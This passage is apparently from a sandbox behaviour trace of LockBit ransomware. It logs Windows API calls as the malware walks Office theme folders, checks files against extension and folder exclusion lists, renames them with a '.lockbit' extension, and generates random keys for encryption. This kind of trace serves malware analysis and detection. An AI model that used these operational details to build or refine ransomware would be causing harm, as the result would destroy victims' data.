Effects\\Urban.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.403] malloc (_Size=0xc2) returned 0x1fa2ed8 [0195.403] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0195.405] free (_Block=0x1fa2ed8) [0195.405] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Urban.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0195.405] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0195.405] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.405] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cd43200, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5caf100, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3cd43200, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x79f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Verve.eftx", cAlternateFileName="VERVE~1.EFT")) returned 1 [0195.405] lstrcmpiW (lpString1=".", lpString2="Verve.eftx") returned -1 [0195.405] lstrcmpiW (lpString1="..", lpString2="Verve.eftx") returned -1 [0195.405] PathFindExtensionW (pszPath="Verve.eftx") returned=".eftx" [0195.405] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0195.405] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0195.405] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0195.406] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0195.406] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0195.406] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0195.406] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0195.406] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0195.406] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0195.406] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0195.406] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0195.406] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0195.406] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0195.406] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0195.406] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0195.406] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0195.406] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0195.406] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0195.406] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0195.406] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0195.406] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0195.406] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0195.406] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0195.406] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0195.406] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.407] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0195.407] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0195.407] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0195.407] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0195.407] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0195.407] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0195.407] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0195.407] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0195.407] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0195.407] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0195.407] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0195.407] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0195.407] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0195.407] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0195.407] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0195.407] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0195.407] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0195.407] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.407] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0195.407] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0195.407] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0195.407] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0195.407] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Verve.eftx") returned -1 [0195.408] lstrcmpiW (lpString1="ntldr", lpString2="Verve.eftx") returned -1 [0195.408] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Verve.eftx") returned -1 [0195.408] lstrcmpiW (lpString1="bootsect.bak", lpString2="Verve.eftx") returned -1 [0195.408] lstrcmpiW (lpString1="autorun.inf", lpString2="Verve.eftx") returned -1 [0195.408] lstrcmpiW (lpString1="thumbs.db", lpString2="Verve.eftx") returned -1 [0195.408] lstrcmpiW (lpString1="iconcache.db", lpString2="Verve.eftx") returned -1 [0195.408] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0195.408] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx") returned=".eftx" [0195.408] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0195.408] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0195.408] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0195.408] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0195.408] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0195.408] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0195.408] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0195.408] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0195.408] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0195.408] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0195.408] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0195.408] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0195.408] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0195.408] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0195.409] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0195.409] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0195.409] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0195.409] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0195.409] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0195.409] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0195.409] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0195.409] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0195.409] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0195.409] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0195.409] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0195.409] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0195.409] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0195.409] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0195.409] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx.lockbit") returned 86 [0195.409] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\verve.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0195.417] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.417] malloc (_Size=0x40068) returned 0x3df0008 [0195.417] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=31224) returned 1 [0195.417] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.417] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.418] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.418] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.418] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.422] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.422] malloc (_Size=0xc2) returned 0x1fa2ed8 [0195.422] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0195.424] free (_Block=0x1fa2ed8) [0195.424] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Verve.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0195.424] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0195.424] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.424] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f664b00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5caf100, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5f664b00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x1b778, dwReserved0=0x0, dwReserved1=0x0, cFileName="Waveform.eftx", cAlternateFileName="WAVEFO~1.EFT")) returned 1 [0195.424] lstrcmpiW (lpString1=".", lpString2="Waveform.eftx") returned -1 [0195.424] lstrcmpiW (lpString1="..", lpString2="Waveform.eftx") returned -1 [0195.424] PathFindExtensionW (pszPath="Waveform.eftx") returned=".eftx" [0195.424] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0195.424] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0195.424] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0195.424] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0195.424] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0195.424] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0195.424] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0195.425] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0195.425] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0195.425] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0195.425] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0195.425] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0195.425] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0195.425] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0195.425] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0195.425] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0195.425] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0195.425] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0195.425] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0195.425] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0195.425] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0195.425] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0195.425] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0195.425] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0195.425] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.425] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0195.425] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0195.425] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0195.425] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0195.426] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0195.426] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0195.426] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0195.426] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0195.426] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0195.426] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0195.426] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0195.426] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0195.426] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0195.426] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0195.426] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0195.426] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0195.426] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0195.426] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.426] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0195.426] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0195.426] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0195.426] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0195.426] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Waveform.eftx") returned -1 [0195.426] lstrcmpiW (lpString1="ntldr", lpString2="Waveform.eftx") returned -1 [0195.426] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Waveform.eftx") returned -1 [0195.426] lstrcmpiW (lpString1="bootsect.bak", lpString2="Waveform.eftx") returned -1 [0195.426] lstrcmpiW (lpString1="autorun.inf", lpString2="Waveform.eftx") returned -1 [0195.427] lstrcmpiW (lpString1="thumbs.db", lpString2="Waveform.eftx") returned -1 [0195.427] lstrcmpiW (lpString1="iconcache.db", lpString2="Waveform.eftx") returned -1 [0195.427] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0195.427] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned=".eftx" [0195.427] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0195.427] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0195.427] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0195.427] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0195.427] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0195.427] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0195.427] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0195.427] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0195.427] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0195.427] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0195.428] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0195.428] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0195.428] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0195.428] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0195.428] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0195.428] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0195.428] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0195.428] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0195.428] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0195.428] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0195.428] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0195.428] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0195.428] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0195.428] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0195.428] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0195.428] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0195.428] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0195.428] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0195.428] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx.lockbit") returned 89 [0195.428] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0195.437] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.437] malloc (_Size=0x40068) returned 0x1ff1e60 [0195.437] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=112504) returned 1 [0195.438] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.438] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0195.438] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.439] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0195.439] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.441] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.441] malloc (_Size=0xc8) returned 0x1fa2ed8 [0195.441] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc8, FileInformationClass=0xa) returned 0x0 [0195.463] free (_Block=0x1fa2ed8) [0195.463] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0195.463] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0195.463] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.463] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f664b00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5caf100, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5f664b00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x1b778, dwReserved0=0x0, dwReserved1=0x0, cFileName="Waveform.eftx", cAlternateFileName="WAVEFO~1.EFT")) returned 0 [0195.464] FindClose (in: hFindFile=0x55fe38 | out: hFindFile=0x55fe38) returned 1 [0195.464] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528a9ed0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6187c750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6187c750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Theme Fonts", cAlternateFileName="THEMEF~1")) returned 1 [0195.464] lstrcmpiW (lpString1=".", lpString2="Theme Fonts") returned -1 [0195.464] lstrcmpiW (lpString1="..", lpString2="Theme Fonts") returned -1 [0195.464] lstrcmpiW (lpString1="Theme Fonts", lpString2="$windows.~bt") returned 1 [0195.464] lstrcmpiW (lpString1="Theme Fonts", lpString2="intel") returned 1 [0195.464] lstrcmpiW (lpString1="Theme Fonts", lpString2="msocache") returned 1 [0195.464] lstrcmpiW (lpString1="Theme Fonts", lpString2="$recycle.bin") returned 1 [0195.464] lstrcmpiW (lpString1="Theme Fonts", lpString2="$windows.~ws") returned 1 [0195.464] lstrcmpiW (lpString1="Theme Fonts", lpString2="tor browser") returned -1 [0195.464] lstrcmpiW (lpString1="Theme Fonts", lpString2="boot") returned 1 [0195.464] lstrcmpiW (lpString1="Theme Fonts", lpString2="system volume information") returned 1 [0195.464] lstrcmpiW (lpString1="Theme Fonts", lpString2="perflogs") returned 1 [0195.464] lstrcmpiW (lpString1="Theme Fonts", lpString2="google") returned 1 [0195.464] lstrcmpiW (lpString1="Theme Fonts", lpString2="application data") returned 1 [0195.464] lstrcmpiW (lpString1="Theme Fonts", lpString2="windows") returned -1 [0195.464] lstrcmpiW (lpString1="Theme Fonts", lpString2="windows.old") returned -1 [0195.464] lstrcmpiW (lpString1="Theme Fonts", lpString2="appdata") returned 1 [0195.464] lstrcmpiW (lpString1="Theme Fonts", lpString2="Windows nt") returned -1 [0195.464] lstrcmpiW (lpString1="Theme Fonts", lpString2="Msbuild") returned 1 [0195.464] lstrcmpiW (lpString1="Theme Fonts", lpString2="Microsoft") returned 1 [0195.465] lstrcmpiW (lpString1="Theme Fonts", lpString2="All users") returned 1 [0195.465] lstrcmpiW (lpString1="Theme Fonts", lpString2="mozilla") returned 1 [0195.465] lstrcmpiW (lpString1="Theme Fonts", lpString2="Microsoft.NET") returned 1 [0195.465] lstrcmpiW (lpString1="Theme Fonts", lpString2="microsoft shared") returned 1 [0195.465] lstrcmpiW (lpString1="Theme Fonts", lpString2="Internet Explorer") returned 1 [0195.465] lstrcmpiW (lpString1="Theme Fonts", lpString2="common files") returned 1 [0195.465] lstrcmpiW (lpString1="Theme Fonts", lpString2="opera") returned 1 [0195.465] lstrcmpiW (lpString1="Theme Fonts", lpString2="Windows Journal") returned -1 [0195.465] wsprintfW (in: param_1=0x3d6c550, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 65 [0195.465] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\*") returned 67 [0195.465] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6bd48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6bd48) returned 0x55fe38 [0195.471] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0195.471] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528a9ed0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6187c750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6187c750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.473] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0195.473] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0195.473] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccc5300, ftCreationTime.dwHighDateTime=0x1cac1e1, ftLastAccessTime.dwLowDateTime=0x61830490, 